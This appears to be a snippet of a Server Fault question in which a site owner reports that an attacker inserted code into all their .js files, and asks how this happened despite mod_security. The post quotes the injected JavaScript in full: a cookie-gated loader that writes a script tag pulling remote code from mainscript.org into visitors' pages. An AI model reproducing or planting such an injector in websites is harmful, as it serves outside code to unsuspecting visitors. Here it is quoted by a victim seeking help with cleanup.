Hacked websites by inserting code in .js files [closed]

view story

http://serverfault.com – Possible Duplicate: My server’s been hacked EMERGENCY It seems that someone hacked I bunch of sites I own by inserting code in all the .js files. function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://mainscript.org/mainscript.js"></script>');} I'm wondering how could he do that since I own the server and I have mod_sec activate, a lot (HowTos)